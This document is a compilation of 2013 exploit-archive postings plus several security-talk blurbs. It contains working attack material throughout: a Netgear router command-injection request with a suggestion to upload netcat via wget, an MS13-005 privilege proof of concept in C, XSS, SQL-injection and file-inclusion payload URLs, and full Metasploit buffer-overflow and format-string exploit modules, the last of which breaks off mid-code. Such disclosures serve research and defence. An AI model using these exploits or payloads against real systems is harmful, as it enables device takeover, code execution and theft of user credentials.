Praetorian503

The Netgear N150 Wireless ADSL2+ Modem Router DGN1000 suffers from cross site scripting, OS command injection, and insecure cryptographic storage vulnerabilities. Firmware versions 1.1.00.24 and 1.1.00.45 are affected. Device Name: DGN1000B Vendor: Netgear ============ Vulnerable Firmware Releases: ============ Firmwareversion: V1.1.00.24 Firmwareversion: V1.1.00.45 Download: http://downloadcenter.netgear.com/de/product/DGN1000 ============ Device Description: ============ The N150 Wireless ADSL2+ Modem Router DGN1000 provides you with an easy and secure way to set up a wireless home network with fast access to the Internet over a high-speed digital subscriber line (DSL). The N150 Modem Router has a built-in DSL modem and is compatible with all major DSL Internet service providers. The security features let you block unsafe Internet content and applications, and protect the devices that you connect to your home network. Source: http://support.netgear.com/product/DGN1000 ============ Shodan Torks ============ Shodan Search: NETGEAR DGN1000 ============ Vulnerability Overview: ============ * OS Command Injection in the UPNP configuration: The vulnerability is caused by missing input validation in the TimeToLive parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device. Param: TimeToLive POST /setup.cgi HTTP/1.1 Host: 192.168.178.188 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Proxy-Connection: keep-alive Referer: http://192.168.178.188/setup.cgi?next_file=upnp.htm Authorization: Basic XXX Content-Type: application/x-www-form-urlencoded Content-Length: 185 Connection: close UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4 Change the Request Methode from HTTP Post to HTTP GET: http://192.168.178.188/setup.cgi?UPnP=UPnP&AdverTime=30&TimeToLive=`%20COMMAND%20`&save=+Anwenden&todo=save&this_file=upnp.htm&next_file=upnp.htm&h_UPnP=enable&hiddenAdverTime=30&hiddenTimeToLive=4 It is possible to cross compile Netcat and upload it via wget, adjust the permissions and execute it. Have phun Sources including needed toolchain: http://kb.netgear.com/app/answers/detail/a_id/2649 direct download: http://www.downloads.netgear.com/files/GPL/DGN1000B_VB1.00.45_GR_src.tar... Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-os-command-wget-check.png Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN1000B-r00ted.png * Insecure Cryptographic Storage: There is no password hashing implemented and so it is saved in plain text on the system: cat /tmp/etc/htpasswd admin:password * XSS Injecting scripts into the following parameters reveals that these parameters are not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code. -> Sicherheit -> Dienste -> neuen Dienst anlegen -> Dienstname Param: service_name http://192.168.178.188/setup.cgi?service_name=%22%3E%3Cimg%20src=%220%22%20onerror=alert%282%29%3E&svc_type=tcp&serv_sport=1&serv_endport=2&save=Anwenden&todo=save&h_svc_type=tcp&edit=1&h_ruleSelect=0&this_file=servinfo.htm&next_file=fw_serv.htm -> WLAN -> Zugriffsliste anpassen -> Hinzufügen -> Gerätename Param: device http://192.168.178.188/setup.cgi?accessLimit=accessLimit&device=%22%3E%3Cimg+src%3D%220%22+onerror=alert(2)>&wirelist_mac=01-11-22-33-44-66&h_accessLimit=enable&h_ruleSelect=0&todo=addmanual&this_file=m_access.htm&next_file=m_access.htm Param: ssid_num http://192.168.178.188/setup.cgi?next_file=adv_wireless.htm&ssid_num=a%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&flag=1 Param: h_skeyword http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=&KeyWordList=0&todo=delete&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=115bcf%22%3E%3Cscript%3Ealert%281%29%3C/script%3Edc575b170bc38bebe&h_KeyWordList=&h_ruleSelect=0&h_trustipenable=disable&c4_Trusted_IPAddress= Param: cfKeyWord_Domain http://192.168.178.188/setup.cgi?skeyword=1&cfKeyWord_Domain=5d0a9%3Cscript%3Ealert%281%29%3C/script%3E&todo=addkeyword&this_file=keyword.htm&next_file=keyword.htm&h_skeyword=1&h_KeyWordList=&h_ruleSelect=&h_trustipenable=disable&c4_Trusted_IPAddress= ============ Solution ============ No known solution available. ============ Credits ============ The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de Advisory URL: http://www.s3cur1ty.de/m1adv2013-005 Twitter: @s3cur1ty_de ============ Time Line: ============ October 2012 - discovered vulnerability 15.10.2012 - Privately reported all details to vendor via email 23.10.2012 - Privately reported all details to vendor via webinterface 24.10.2012 - Netgear replied to forward the details internally 31.10.2012 - Netgear closes the case 31.10.2012 - Requested more details why the case is now closed. 31.10.2012 - Netgear responded that they will check the state of the case 06.11.2012 - Netgear requested the Serial Number of the device 08.11.2012 - Responded with the Serial Number 13.11.2012 - something goes on - I got a product registration confirmation 03.12.2012 - Case closed by Netgear - No new firmware available 16.01.2013 - Netgear contacted me again requesting to check a Beta version 22.01.2013 - Tested Beta Firmware and gave feedback to vendor 06.02.2013 - public release ===================== Advisory end ===================== Source: PacketStorm

MS13-005 proof of concept exploit to drive a medium IL cmd.exe via a low IL process and message broadcasted. /* ms13-005-funz-poc.cpp - Drive a Medium IL cmd.exe via a Low IL process and message broadcasted Copyright (C) 2012 Axel "0vercl0k" Souchet - http://www.twitter.com/0vercl0k This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. @taviso did all the job, I just followed its blogpost: -> http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html -- amazing. Cool trick: -> If you want to set this process to a low IL you can use: icacls ms13-005-funz-poc.exe /setintegritylevel L -> The new ms13-005-funz-poc.exe will be now launched as low IL (you can check it with process explorer) */ #include <windows.h> #include <stdio.h> int main() { STARTUPINFO si = {0}; PROCESS_INFORMATION pi = {0}; PCHAR payload[] = { "echo \".___ _____ ______________ ______________ \"> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"| | / \\ \\__ ___/ | \\_ _____/ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"| |/ \\ / \\ | | / ~ \\ __)_ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"| / Y \\ | | \\ Y / \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"|___\\____|__ / |____| \\___|_ /_______ / \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \" \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \" _______ .___ ________ ________ _____ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \" \\ \\ | |/ _____/ / _____/ / _ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \" / | \\| / \\ ___/ \\ ___ / /_\\ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ | \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \"\\____|__ /___|\\______ /\\______ /\\____|__ / \">> %USERPROFILE%\\Desktop\\TROLOLOL", "echo \" \\/ \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL", "exit", NULL }; printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy ? Press to continue\n"); getchar(); si.cb = sizeof(si); CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, ? ); Sleep(1000); // Yeah, you can "bruteforce" the index of the window.. printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI.."); keybd_event(VK_LWIN, 0x5B, 0, 0); keybd_event(VK_LSHIFT, 0xAA, 0, 0); keybd_event(0x37, 0x87, 0, 0); keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0); keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0); keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0); Sleep(1000); printf("3] Killing now the useless low IL cmd.exe..\n"); TerminateProcess( pi.hProcess, 1337 ); printf("4] Now driving the medium IL cmd.exe with SendMessage and HWND_BROADCAST (WM_CHAR)\n"); printf(" \"Drive the command prompt [..] to make it look like a scene from a Hollywood movie.\" <- That's what we're going to do!\n"); for(unsigned int i = 0; payload[i] != NULL; ++i) { for(unsigned int j = 0; j < strlen(payload[i]); ++j) { // Yeah, that's the fun part to watch ;D Sleep(10); SendMessage( HWND_BROADCAST, WM_CHAR, payload[i][j], 0 ); } SendMessage( HWND_BROADCAST, WM_CHAR, VK_RETURN, 0 ); } return EXIT_SUCCESS; } Source: PacketStorm

WordPress Audio Player versions prior to 2.0.4.6 suffer from a cross site scripting vulnerability in player.swf. # Exploit Title: Wordpress Audio Player Plugin XSS in SWF # Release Date: 31/01/13 # Author: hip [Insight-Labs] # Contact: hip@insight-labs.org | Website: http://insight-labs.org # Software Link: http://downloads.wordpress.org/plugin/audio-player.2.0.4.6.zip # Vendor Homepage: http://wpaudioplayer.com/ # Tested on: XPsp3 # Affected version: 2.0.4.6 before # Google Dork: inurl:/wp-content/plugins/audio-player/ #Ref:CVE-2013-1464 ----------------------------------------------------------------------------------------------------------------------- # Introduction: Audio Player is a highly configurable but simple mp3 player for all your audio needs. ------------------------------------------------------------------------------------------------------------------------- # XSS - Proof Of Concept: vulnerable path: /wp-content/plugins/audio-player/assets/player.swf vulnerabile parameter:playerID POC: /wp-content/plugins/audio-player/assets/player.swf?playerID=a\"))}catch(e){alert(1)}// ------------------------------------------------------------------------------------------------------------------------- ------------ Patch: ------------ -- Vendor was notified on the 23/01/2013 -- Vendor released version 2.0.4.6 on 30/01/2013 Fixed the bug ------------------------------------------------------------------------------------------------------------------------- Source: PacketStorm

Description: Frequently people consider a serial number as nothing but a number but in this presentation you will be shown the multitude of ways in which an attacker could utilize serial numbers to hurt you,to hurt companies as well as to track your movements. A brief primer on the function and use of serial numbers in the real world will be provided. Focusing on Apple, Amazon and Pringles and providing in-depth insight into the varying degrees of trust a serial number will gain you. Attack vectors ranging from Apple to Pringles and everywhere in between along with points about how to prevent similar tragedies from occurring with your product. Darkred is a high-school student currently residing in the United States. In his free time, he enjoys testing the vulnerabilities of companies' security and warranty policies. He does this in order to make said companies aware of serious flaws in their policies. His tests range from High Value Electronics to free coupons for soda and chips. With this information, he hopes that big companies like Apple can protect their warranty policies and their consumers. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Target Attacks On Warranties For Fun And Profit

Description: Walk into Starbucks, plop down a laptop, click start, watch the credentials roll in. Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network, and even exploiting machines through race conditions. Now walk into a corporation... A rapidly-expanding portion of today's Internet strives to increase personal efficiency by turning tedious or complex processes into a framework which provides instantaneous results. On the contrary, much of the information security community still finds itself performing manual, complicated tasks to administer and protect their computer networks. The purpose of this presentation is to discuss a new Man-In-The-Middle attack tool called Subterfuge. Subterfuge is a simple but devastatingly effective credential-harvesting program, which exploits vulnerabilities in the inherently trusting Address Resolution Protocol. It does this in a way that even a non-technical user would have the ability, at the push of a button, to attack all machines connected to the network. Subterfuge further provides the framework by which users can then leverage a MITM attack to do anything from browser/service exploitation to credential harvesting, thus equipping information and network security professionals and enthusiasts alike with a sleek "push-button" security validation tool. Matthew M. Toussain developed the Air Force's introductory Cyber Warfare curriculum at the United States Air Force Academy, promoting information assurance through a ten day, fast-paced, offense focused program. As a senior at the Academy he participates in national and international cyber competitions with the AF Academy's Cyber Competition Team. Twitter: @0sm0s1z Facebook: mtoussain subterfuge - Automated Man-in-the-Middle Attack Framework - Google Project Hosting Christopher Shields, Lieutenant in the United States Air Force, was the first-ever Cyber Commander pioneering the United States Air Force Academy's intensive summer curriculum. As an integral four-year member of the Academy's internationally-recognized Cyber Warfare CompetitionTeam, he drove their 2012 Cyber Defense Exercise win, hosted by the NSA, and their second place finish at the 2012 National Collegiate Cyber Defense Competition. A Cyberspace Operations Officer, Lieutenant Shields holds a Computer Science-Cyber Warfare degree. His growing experience and interest includes network penetration testing, network mapping and enumeration, intrusion detection, exploitation and persistence, and security research. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Subterfuge: The Automated Man-In-The-Middle Attack Framework

Description: The precursor to cracking any password is getting the right hash. In this talk we are going to cover how we discovered that Cain and Able, Creddump, Metasploit and other hash extraction tools regularly yield corrupt hashes that cannot be cracked. We will take a deep dive into password extraction mechanics, the birth of a viral logic flaw that started it all and how to prevent corrupt hashes. At the conclusion of this talk we will release patches that prevent hash corruption in these tools that many security professionals use every day. Ryan Reynolds has been with Crowe for five years and is the Manager responsible for Crowe's Penetration Testing services. Ryan has a wide range of knowledge and experience in system administration and networking to include security applications and controls. He is a technical lead for engagements including application, network and infrastructure penetration testing on both internal and external systems as well as social engineering & physical security assessments. Twitter: @reynoldsrb Jonathan Claudius is a Security Researcher at Trustwave. He is a member of Trustwave's SpiderLabs - the advanced security team focused on penetration testing, incident response, and application security. He has ten years of experience in the IT industry with the last eight years specializing in Security. At Trustwave, Jonathan works in the SpiderLabs Research Division where he focuses on vulnerability research, network exploitation and is the creator of the BNAT-Suite. Before joining SpiderLabs, Jonathan ran Trustwave's Global Security Operations Center. Twitter: @claudijd Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Stamp Out Hash Corruption! Crack All The Things!

Description: In 2011, SQL injections became front page news as ever more high profile companies were victims of automated SQL injection attacks. Responders spent countless hours looking at values in log files like "0x31303235343830303536" trying to figure out what was being exfiltrated by whom. Incident response costs skyrocketed while the cost of attacking fell. This presentation will debut SQL ReInjector, a tool for the rapid assessment of logs from SQL injection attacks to determine what data was exfiltrated. When responding to an SQL injection attack, responders have to determine what was exfiltrated by manually parsing the web server logs from the victimized host. This is a time consuming process that requires a significant amount of a responder’s time. Moreover, manual replay of the SQL injection does not account for system level discrepancies in how queries are executed by the system â€" running SQL against a SQL server directly doesn’t account for the behavior of any intermediary systems â€" e.g. any application layer logic or nuances in how the web application and database server interact. SQL ReInjector uses the log files from the machine that has been subject to a SQL injection attack to replay the attack against the server (or a virtualized forensic image thereof) and captures the data returned by the SQL injection web site requests, reducing the amount of time responders have to spend looking at web server logs and allows for responders to recreate the data exfiltrated through a SQL injection attack. Jason A. Novak is an Assistant Director of Digital Forensics in Stroz Friedberg's Chicago office. At Stroz Friedberg, Mr. Novak has been lead examiner in a wide range of cases involving digital forensics, incident response, application testing, source code analysis, and data analytics, and has developed numerous tools to expedite the firm's analysis and response capabilities. The proprietary tools developed by Mr. Novak have included: an anti-money laundering data analytics platform and tools to process electronically stored information to respond to forensic and electronic discovery requests. As a co-writer of the Google Street View report, Mr. Novak analyzed the source code to gstumbler, the WiFi device geolocation application used by Google as part of the Street View project, and documented its structure and functionality in a publicly released report; Mr. Novak has responded to inquiries about the report from domestic and foreign regulators. Twitter: @strozfriedberg STROZ FRIEDBERG LLC | Digital Risk Management & Investigations Andrea (Drea) London is a Digital Forensic Examiner in Stroz Friedberg's Dallas office. At Stroz Friedberg, Ms. London acquires and examines digital evidence from laptops, desktops and mobile phones in support of legal proceedings, criminal matters, and/or corporate investigations. Additionally she is responsible for implementing large-scale, end-to-end electronic discovery for both civil and criminal litigation. Ms. London previously held positions at Arsenal Security Group and IBM’s Internet Security Systems Emergency Response Team. At Arsenal, Ms. London was an integral part of the company’s immediate response team for worldwide cyber security incidents. During this time she completed and has maintained certification as a Payment Application Qualified Security Assessor (PA QSA), Payment Card Industry (PCI QSA), and PCI Forensic Investigators (PFI), one of the first appointed by the PCI Council. At IBM, she acted as an official Quality Incident Response Assessor (QIRA) reporting PCI breaches to major card brands. Prior to her work for IBM, Ms. London was with the Air Force Office of Special Investigations (AFOSI), where she was one of two Airmen chosen for special duty assignment at the Defense Cyber Crime Center, and where she was tasked with testing and evaluating forensic software and hardware for the Center. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Sql Reinjector - Automated Exfiltrated Data Identification

Description: I can help you with Step 1. In this talk, I'll describe several 0-day vulnerabilities in Netgear wireless routers. I'll show you how to exploit an unexposed buffer overflow using nothing but a SQL injection and your bare hands. Additionally, I'll show how to use the same SQL injection to extract arbitrary files from the file systems of the wifi routers. This presentation guides the audience through the vulnerability discovery and exploitation process, concluding with a live demonstration. In the course of describing several vulnerabilities, I present effective investigation and exploitation techniques of interest to anyone analyzing SOHO routers and other embedded devices. Zachary Cutlip is a security researcher with Tactical Network Solutions, in Columbia, MD. At TNS, Zach develops exploitation techniques targeting embedded systems and network infrastructure. Since 2003, Zach has worked either directly for or with the National Security Agency in various capacities. Before becoming a slacker, he spent six years in the US Air Force, parting ways at the rank of Captain. Zach holds an undergraduate degree from Texas A&M University and a master's degree from Johns Hopkins University. Twitter:@zcutlip Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Sql Injection To Mips Overflows: Rooting Soho Routers

Easy Live Shop System suffers from a remote SQL injection vulnerability. +-------------------------------------------------- | Easy Live Shop System SQL Injection Vulnerability | By cr4wl3r http://bastardlabs.info | http://bastardlabs.info/news/?id=85 | Link : http://www.media-products.de/easy-live-shop-system-p-840.html | Demo : http://www.media-products-demoserver.de/ph414/ | Tested : Win 7 +-------------------------------------------------- Poc : http://bastardlabs/[path]/index.php?seite=17&aid=[SQLi] Example : index.php?seite=17&aid=NULL/**/UNION/**/SELECT/**/NULL,CONCAT(CHAR(61),CHAR(61),CHAR(123),CHAR(123),CHAR(123),name,0x7c,0x7c,Email,0x7c,0x7c,Passwort,CHAR(125),CHAR(125),CHAR(125),CHAR(125),0x7c),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/LS_Kunden Source: PacketStorm

SiteGo suffers from cross site scripting and local file inclusion vulnerabilities. ################################################# ### Exploit Title: SiteGo Multiple Vulnerabilities ### Date: 02/07/2013 ### Author: L0n3ly-H34rT ### Contact: l0n3ly_h34rt@hotmail.com ### My Site: http://se3c.blogspot.com/ ### Vendor Link: http://site-go.com/ ### Software Link: http://site-go.com/free/site-go.zip ### Tested on: Linux/Windows ################################################# # Multiple Local File Inclusion : http://127.0.0.1/site-go/admin/extra/contacts/DownloadMailAttach.php?file=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/StyleManager/EditFile.php?OpenFolder=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/edit_config/index.php?idc=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/visitors/index.php?idv=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/stylemanager/index.php?ids=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/site_reports/index.php?idc=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/my_tools/index.php?idt=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/my_account/index.php?idm=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/mysql/index.php?idm=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/moderators/index.php?idm=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/mainlinks/index.php?idl=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/linksmanager/index.php?idl=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/ipdenymanager/index.php?idm=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/filesmanager/index.php?idf=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/feedout/index.php?idf=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/contacts/index.php?idc=../../../../../../../../../../windows/win.ini%00 http://127.0.0.1/site-go/admin/extra/backup/index.php?idb=../../../../../../../../../../windows/win.ini%00 Also Inject The Cookies In Main Page By This : style_name=../../../../../../../../../../windows/win.ini%00 # XSS : http://127.0.0.1/site-go/?action=vote&Browse=[XSS] http://127.0.0.1/site-go/?action=MailList&articles=&B1=ãÊÇÈÚÉ&delete=[XSS]&reason=1 Many Files is affect ####################################################### # Notes : 1- Must be magic_quotes_gpc = Off 2- phpinfo() : http://127.0.0.1/site-go/admin/include/phpinfo.php 3- Remote File Inclusion Doesn't Fix Yet ! : http://www.exploit-db.com/exploits/21222/ Source: PacketStorm

This Metasploit module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW Server can be used to transfer fax messages to the fax server without any underlying protocols. To note significant fields in the fax being transfered, like fax number and recipient, you can use ActFax data fields. @F506,@F605, and @F000 are all data fields that are vulnerable. This has been fixed in a beta version which will not be pushed to release until May 2013. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'ActFax 5.01 RAW Server Buffer Overflow', 'Description' => %q{ This module exploits a vulnerability in ActFax Server 5.01 RAW server. The RAW Server can be used to transfer fax messages to the fax server without any underlying protocols. To note significant fields in the fax being transfered, like fax number and receipient, you can use ActFax data fields. @F506,@F605, and @F000 are all data fields that are vulnerable. For more information refer to the 'data fields' section of the help menu in ActFax. This has been fixed in a beta version which wont be pushed to release until May 2013. Beta is here: http://www.actfax.com/download/beta/actfax_setup_en.exe }, 'License' => MSF_LICENSE, 'Author' => [ 'Craig Freyman @cd1zz', #discovery and msf 'corelanc0d3r', #lots of help with getpc routine => https://www.corelan-training.com/index.php/training/corelan-live ], 'References' => [ [ 'OSVDB', '' ], [ 'CVE', '' ], [ 'URL', 'http://www.pwnag3.com/2013/02/actfax-raw-server-exploit.html' ] ], 'DefaultOptions' => { 'ExitFunction' => 'none', 'InitialAutoRunScript' => 'migrate -f', }, 'Platform' => 'win', 'Payload' => { 'BadChars' => "\x00\x40", 'DisableNops' => true, 'Space' => 1000, 'EncoderType' => Msf::Encoder::Type::AlphanumMixed, 'EncoderOptions' => { 'BufferRegister' => 'EBX' } }, 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x775e3422, #ole32.dll v5.1.2600.6168 'Offset' => 1024 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Feb 5 2013', 'DefaultTarget' => 0)) register_options([Opt::RPORT(0)], self.class) end def exploit connect getpc = "\xe8\xff\xff\xff\xff\xc3\x5b" #ebx| call + 4: add_ebx = "\x83\xc3\x20" #add ebx,32 fill = "\x4b" * 5 #inc ebx 5 times fill2 = "\x90" * 17 stack_adjust = "\x81\xc4\x24\xfa\xff\xff" #add esp,-1500 shell_chunk1 = payload.encoded[0,522] shell_chunk2 = payload.encoded[522,payload.encoded.length-522] buffer = "" buffer << shell_chunk2 buffer << rand_text_alpha(target['Offset']-buffer.length) buffer << [target.ret].pack('V') buffer << stack_adjust buffer << getpc buffer << add_ebx buffer << fill buffer << fill2 buffer << shell_chunk1 print_status("Trying target #{target.name}...") sock.put("@F506 "+buffer+"@\r\npwnag3\r\n\r\n") handler disconnect end end Source: PacketStorm

This Metasploit module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML def initialize(info={}) super(update_info(info, 'Name' => 'VMWare OVF Tools Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jeremy Brown', # Vulnerability discovery 'juan vazquez' # Metasploit Module ], 'References' => [ [ 'CVE', '2012-3569' ], [ 'OSVDB', '87117' ], [ 'BID', '56468' ], [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ] ], 'Payload' => { 'DisableNops' => true, 'BadChars' => (0x00..0x08).to_a.pack("C*") + "\x0b\x0c\x0e\x0f" + (0x10..0x1f).to_a.pack("C*") + (0x80..0xff).to_a.pack("C*") + "\x22", 'StackAdjustment' => -3500, 'PrependEncoder' => "\x54\x59", # push esp # pop ecx 'EncoderOptions' => { 'BufferRegister' => 'ECX', 'BufferOffset' => 6 } }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Targets' => [ # vmware-ovftool-2.1.0-467744-win-i386.msi [ 'VMWare OVF Tools 2.1 on Windows XP SP3', { 'Ret' => 0x7852753d, # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1 'AddrPops' => 98, 'StackPadding' => 38081, 'Alignment' => 4096 } ], ], 'Privileged' => false, 'DisclosureDate' => 'Nov 08 2012', 'DefaultTarget' => 0)) end def ovf my_payload = rand_text_alpha(4) # ebp my_payload << [target.ret].pack("V") # eip # call esp my_payload << payload.encoded fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000) fs << rand_text_alpha(target['Alignment']) # Align to 0x11000 fs << my_payload # 65536 => 0x10000 # 27 => Error message prefix length fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8)) fs << "%08x" * target['AddrPops'] # Reach saved EBP fs << "%hn" # Overwrite LSW of saved EBP with 0x1000 ovf_file = <<-EOF <?xml version="1.0" encoding="UTF-8"?> <Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1" xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common" xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1" xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData" xmlns:vmw="http://www.vmware.com/schema/ovf" xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <References> <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" /> </References> <DiskSection> <Info>Virtual disk information</Info> <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="http://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" /> </DiskSection> <VirtualSystem ovf:id="Small VM"> <Info>A virtual machine</Info> </VirtualSystem> </Envelope> EOF ovf_file end def on_request_uri(cli, request) agent = request.headers['User-Agent'] uri = request.uri if agent !~ /VMware-client/ or agent !~ /ovfTool/ print_status("User agent #{agent} not recognized, answering Not Found...") send_not_found(cli) end if uri =~ /.mf$/ # The manifest file isn't required print_status("Sending Not Found for Manifest file request...") send_not_found(cli) end print_status("Sending OVF exploit...") send_response(cli, ovf, {'Content-Type'=>'text/xml'}) end end Source: PacketStorm

This Metasploit module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3. ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'VMWare OVF Tools Format String Vulnerability', 'Description' => %q{ This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for Windows. The vulnerability occurs when printing error messages while parsing a a malformed OVF file. The module has been tested successfully with VMWare OVF Tools 2.1 on Windows XP SP3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jeremy Brown', # Vulnerability discovery 'juan vazquez' # Metasploit Module ], 'References' => [ [ 'CVE', '2012-3569' ], [ 'OSVDB', '87117' ], [ 'BID', '56468' ], [ 'URL', 'http://www.vmware.com/security/advisories/VMSA-2012-0015.html' ] ], 'Payload' => { 'DisableNops' => true, 'BadChars' => (0x00..0x08).to_a.pack("C*") + "\x0b\x0c\x0e\x0f" + (0x10..0x1f).to_a.pack("C*") + (0x80..0xff).to_a.pack("C*") + "\x22", 'StackAdjustment' => -3500, 'PrependEncoder' => "\x54\x59", # push esp # pop ecx 'EncoderOptions' => { 'BufferRegister' => 'ECX', 'BufferOffset' => 6 } }, 